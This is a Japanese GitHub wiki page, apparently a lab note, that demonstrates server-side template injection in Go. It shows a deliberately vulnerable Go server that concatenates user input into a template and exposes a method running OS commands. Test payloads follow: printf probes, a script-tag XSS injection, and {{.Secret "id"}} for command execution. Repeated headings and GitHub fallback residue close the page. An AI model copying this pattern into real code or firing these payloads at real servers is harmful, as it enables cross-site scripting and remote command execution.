サーバーサイドテンプレートインジェクション

脆弱なソースコード　（go Template)

package main

import (
  "html/template"
  "net/http"
  "os/exec"
)

type Person string

func (p Person) Secret (test string) string {
	out, _ := exec.Command(test).CombinedOutput()
	return string(out)
}

func (p Person) Label (test string) string {
	return "This is " + string(test)
}

func handler(w http.ResponseWriter, r *http.Request) {
  //var name = ""
  r.ParseForm()                     // Parses the request body
  x := r.Form.Get("name")

  var tmpl = `<!DOCTYPE html><html><body>
<form action="/" method="post">
    First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>` + x + ` </p></body></html>`

  t := template.New("main") //name of the template is main
  t, _ = t.Parse(tmpl) // parsing of template string
  t.Execute(w, Person("Gus"))
}

func main() {
  server := http.Server{
    Addr: "0.0.0.0:5090",
  }
  http.HandleFunc("/", handler)
  server.ListenAndServe()
}

攻撃する方法 XSSだけ？

{{printf "ssti" }}

{{printf "%s" "ssti" }}

{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}

テンプレートがOSコマンド実行してる

{{.Secret "id"}}

SSTI go 01 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード　（go Template)

攻撃する方法 XSSだけ？

テンプレートがOSコマンド実行してる

参考

⚠️ GitHub.com Fallback ⚠️

SSTI go 01 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード （go Template)

攻撃する方法 XSSだけ？

テンプレートがOSコマンド実行してる

参考

⚠️ **GitHub.com Fallback** ⚠️

脆弱なソースコード　（go Template)

⚠️ GitHub.com Fallback ⚠️